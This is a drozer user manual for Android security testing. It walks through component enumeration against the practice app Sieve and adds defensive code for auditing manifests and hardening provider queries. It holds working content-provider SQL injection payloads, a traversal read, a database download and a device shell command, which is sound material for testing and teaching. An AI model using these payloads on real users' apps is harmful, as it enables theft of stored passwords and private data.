Drozer User Manual

Installation and startup of the Drozer tool (source code: https://github.com/mwrlabs/drozer/)
1. Installation
(1) Download: https://www.mwrinfosecurity.com/products/drozer/community-edition/
On a Mac you can download the Python version.
(2) Install drozer on the PC:
sudo easy_install --allow-hosts pypi.python.org protobuf==2.4.1
easy_install twisted==10.2.0 (to support Infrastructure mode)
sudo easy_install ./drozer-2.3.4-py2.7.egg
(3) Install agent.apk on the Android device
adb install agent.apk
2. Start
(1) Use adb on the PC to forward the port used by Drozer (31415):
adb forward tcp:31415 tcp:31415
(2) Open the Drozer Agent on the Android device and set Embedded Server to Enabled
(3) Open the Drozer Console on the PC
drozer console connect

 

1. Android component security testing

1. Get the package name
dz> run app.package.list -f sieve

com.mwr.example.sieve

2. Get the basic information of the app

run app.package.info -a com.mwr.example.sieve

3. Determine the attack surface

run app.package.attacksurface com.mwr.example.sieve
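
A developer-side counterpart to this step, as an added example that is not part of the original manual or of drozer: it reads a decoded AndroidManifest.xml and reports exported components with no permission, plus the debuggable flag. The sample manifest and function names are constructed, and a component without android:exported is treated as exported when it declares an intent filter (the legacy default).

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"
KINDS = ("activity", "receiver", "provider", "service")

# Constructed sample manifest (not taken from any real app).
SAMPLE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed">
  <application android:debuggable="true">
    <activity android:name=".Main">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".Settings" android:exported="false"/>
    <provider android:name=".DBProvider" android:exported="true"
              android:authorities="com.example.constructed.db"/>
    <provider android:name=".Guarded" android:exported="true"
              android:permission="com.example.constructed.READ"/>
    <service android:name=".Sync"/>
  </application>
</manifest>"""

def is_exported(el):
    flag = el.get(NS + "exported")
    if flag is not None:
        return flag == "true"
    # Assumption: no explicit flag means exported only if an intent filter exists.
    return el.find("intent-filter") is not None

def is_guarded(el, app):
    # A component permission, or the <application> default, restricts callers.
    if el.get(NS + "permission") or app.get(NS + "permission"):
        return True
    # Providers may instead guard reads and writes separately.
    return bool(el.get(NS + "readPermission") and el.get(NS + "writePermission"))

def audit(manifest_xml):
    app = ET.fromstring(manifest_xml).find("application")
    findings = {kind: [] for kind in KINDS}
    for kind in KINDS:
        for el in app.findall(kind):
            if is_exported(el) and not is_guarded(el, app):
                findings[kind].append(el.get(NS + "name"))
    findings["debuggable"] = app.get(NS + "debuggable") == "true"
    return findings

if __name__ == "__main__":
    for key, value in audit(SAMPLE).items():
        print(key, value)
```
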

4. Activity

(1) Get activity information

run app.activity.info -a com.mwr.example.sieve

(2) Start the activity

run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

dz> help app.activity.start
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY]
                              [--component PACKAGE COMPONENT] [--data-uri DATA_URI]
                              [--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
                              [--mimetype MIMETYPE]

5. Content Provider

(1) Get Content Provider information

run app.provider.info -a com.mwr.example.sieve

(2) Content Providers (data leakage)

First get all accessible Uri:

run scanner.provider.finduris -a com.mwr.example.sieve

Get data for each Uri:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

If the query returns data, the provider is leaking it, which indicates a vulnerability.

(3) Content Providers (SQL injection)

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

If an error is returned, SQL injection is present.

List all tables:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

Get the data in a table (for example Key):

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

(4) Check for SQL injection and directory traversal together

run scanner.provider.injection -a com.mwr.example.sieve

run scanner.provider.traversal -a com.mwr.example.sieve
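
Why the single quote produces an error, and how a provider avoids it, as an added example that is not part of the original manual or of Sieve's code. The table layout, sample rows and function names are constructed, and Python's sqlite3 stands in for the SQLite database behind the provider.

```python
import sqlite3

ALLOWED = {"_id", "service", "username", "password"}  # assumed column names

def make_db():
    # Constructed stand-in for the app's database; rows are sample data.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT,
                                username TEXT, password TEXT);
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Passwords (service, username, password)
            VALUES ('mail', 'alice', 'constructed-secret');
        INSERT INTO Key VALUES ('constructed-master', '0000');
    """)
    return db

def query_vulnerable(db, projection, selection=None):
    # Caller-supplied projection and selection are pasted into the statement,
    # so a lone quote breaks the syntax and "* FROM Key;--" rewrites the query.
    sql = "SELECT " + ", ".join(projection) + " FROM Passwords"
    if selection:
        sql += " WHERE (" + selection + ")"
    return db.execute(sql).fetchall()

def query_hardened(db, projection, where_column=None, where_value=None):
    # Projection and filter column must be known column names; the filter
    # value is bound as a parameter and never becomes part of the SQL text.
    columns = list(projection) or sorted(ALLOWED)
    for name in columns + ([where_column] if where_column else []):
        if name not in ALLOWED:
            raise ValueError("rejected column: %r" % name)
    sql = "SELECT " + ", ".join(columns) + " FROM Passwords"
    args = ()
    if where_column:
        sql += " WHERE " + where_column + " = ?"
        args = (where_value,)
    return db.execute(sql, args).fetchall()

if __name__ == "__main__":
    db = make_db()
    for probe in (["'"], ["* FROM Key;--"]):
        try:
            print("vulnerable", probe, "->", query_vulnerable(db, probe))
        except sqlite3.OperationalError as exc:
            print("vulnerable", probe, "-> error:", exc)
        try:
            print("hardened  ", probe, "->", query_hardened(db, probe))
        except ValueError as exc:
            print("hardened  ", probe, "->", exc)
```

On Android the corresponding controls are a projection map with strict mode on SQLiteQueryBuilder and values passed as bound selectionArgs.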

6. Service

(1) Get service details

run app.service.info -a com.mwr.example.sieve

Start a service without drozer:

am startservice -n <package name>/<service name>

7. Broadcast Receiver

app.broadcast.info: get information about broadcast receivers

app.broadcast.send: send a broadcast via an intent

 

 

All commands:

> list  //list the currently available modules; ls also works
> help app.activity.forintent       //show help for the specified module
> run app.package.list      //list the apps installed on the Android device
> run app.package.info -a com.android.browser       //show basic information about the specified app
> run app.activity.info -a com.android.browser      //list the activity components in the app
> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com  //start an activity, e.g. launch the browser to open the Google page
> run scanner.provider.finduris -a com.sina.weibo       //find Content Providers that can be read
> run app.provider.query content://settings/secure --selection "name='adb_enabled'"    //read the contents of the specified Content Provider
> run scanner.misc.writablefiles --privileged /data/data/com.sina.weibo     //list world-writable/readable files under the specified path
> run shell.start       //shell access
> run tools.setup.busybox       //install busybox
> list auxiliary        //view content provider information through a web interface
> help auxiliary.webcontentresolver     //help for webcontentresolver
> run auxiliary.webcontentresolver      //once running, it can be accessed in a browser at http://localhost:8080
Example using sieve:
> run app.package.list -f sieve         //find the sieve application
> run app.package.info -a com.mwr.example.sieve         //show basic information about the package
> run app.package.attacksurface com.mwr.example.sieve   //determine the attack surface
> run app.activity.info -a com.mwr.example.sieve         //get activity information
> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList     //start PWList
> run app.provider.info -a com.mwr.example.sieve        //provider information
> run scanner.provider.finduris -a com.mwr.example.sieve        //scan for all accessible URIs
> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical  //query the accessible DBContentProvider/Passwords URI
> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"   //check for injection
> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts    //view data that can be read
> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db //download data
> run scanner.provider.injection -a com.mwr.example.sieve       //scan for injectable URIs
> run scanner.provider.traversal -a com.mwr.example.sieve
> run app.service.info -a com.mwr.example.sieve         //view services
